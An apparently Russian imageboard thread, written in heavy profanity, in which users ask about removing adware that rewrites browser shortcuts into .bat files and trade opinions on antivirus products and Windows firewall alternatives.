Бля бля, в пути к браузеру постоянная подмена exe на bat. в этом батнике прописан путь к рекламе, которая постоянно открывается на стартовой стр в любом браузере. я эти batы и удалял бля и изменял один хуй, после перезагрузки они создаются вновь. че делать то?
короче, постоянная подмена в пути к браузере exe на bat, в этом батнике ссылка на рекламу, которая открывается при запуске любого браузера. удалял я эти батники, изменял - один хуй, они создаются после перезагрузки опять. как это удалить, мучаюсь уже очень долго.
)))))
Почему ты не можешь в гугл? Я твою проблему за половину наносекунды нагуглил.
так подскажи мне
Бамп нужному треду. Ну так поясните - какое будет окончательное решение вопроса по антивирусам? Что сейчас есть годного? Пробывал:
- штатный Дефендер, по защите - так себе, тормозит пекарню, долго проверяет папки, если там много екзешников
- Др.Веб - тормозит инет, сука. Ебанутый интерфейс через минипанельку
- Авира - фаер юзает встроенный, нахуа тогда она вообще продается? Легче юзать фри + тот же штатный шин-фаер, но заебет рекламой.
- Аваст - хз, в последние пару лет превратился в детский сад с кучей панелей, функций, баннеров. Интерфейс ебанутый наглухо. По тестам не очЬ.
- Кашпирский - вроде ботнет.
- 360 - китайский ботнет с кучей говноптимизаторов. Не нравится что он лезет туда, где антивирусу вообще нехуй делать (обновление системы, к примеру).
- штатный Дефендер, по защите - так себе, тормозит пекарню, долго проверяет папки, если там много екзешников
- Др.Веб - тормозит инет, сука. Ебанутый интерфейс через минипанельку
- Авира - фаер юзает встроенный, нахуа тогда она вообще продается? Легче юзать фри + тот же штатный шин-фаер, но заебет рекламой.
- Аваст - хз, в последние пару лет превратился в детский сад с кучей панелей, функций, баннеров. Интерфейс ебанутый наглухо. По тестам не очЬ.
- Кашпирский - вроде ботнет.
- 360 - китайский ботнет с кучей говноптимизаторов. Не нравится что он лезет туда, где антивирусу вообще нехуй делать (обновление системы, к примеру).
Что скажете насчет Microsoft Security Essentials? Сижу на нем года два-три, проблем нет, возможно из-за того, что я не качаю clubas_muzik_2011.mp3.exe
Есть ли у него какие то подводные камни?
Есть ли у него какие то подводные камни?
Анон, кто объяснит, почему Аваст хуета?
А ты с какой целью интересуешься?
Bitdefender Free. Не благодари.
Минусы первого очевидны - вместе с обновлениями может прилететь что-нибудь лишнее (типа сбоя активации или пачки зондов, знаем мы майкрософт), не не настраивается толком, предположительно хуево ловит.
Минусы других вариантов - зачем ставить чужой зонд, если майкрософт уже запилила свой. Сомнительное, но имеющее право на жизнь мнение. Касперского ставить особенно нежелательно, потому что он таки СЛЕДИТ.
Кстати, важный и не всплывавший тут на моей памяти вопрос - а чем заменить пробные касперского/доктор веб, когда вот позарез нужно проверить папку, но в ней поровну размазано цп, майнкампф на всех языках, кухня домашнего террориста, агитационные видео игил и полный пиратский сборник русской попсы? На ум приходит только очевидное отключение интернета и проверка в виртуалке, но последнее не всегда осуществимо из-за большого объема данных в директории, а первое - не факт, что после удаления cure it/virus removal tool не оставляет чего-нибудь в системе.
И еще вопрос - стандартный файрвол винды уже совсем никуда не годится, исключения в него пишет кто и когда хочет, админить его до ужаса некомфортно (отдельные правила на вход и выход, негибкое формулирование правил, невозможность совместить правило "конкретная программа И конкретный набор портов", а только "порт открыт ВСЕМ" или "программе открыты ВСЕ порты"...неудобств куча, на самом деле. Кроме очевидной сомнительности его работы вообще. Комодо окончательно стал мокрописькой, за аутпост платить как-то западло. Ваши предложения? Важен удобный интерактивный режим обучения. Желательно при этом иметь что-то без лишних зондов. И вообще, нужен ли файрвол сидящим за NAT роутера в 2016?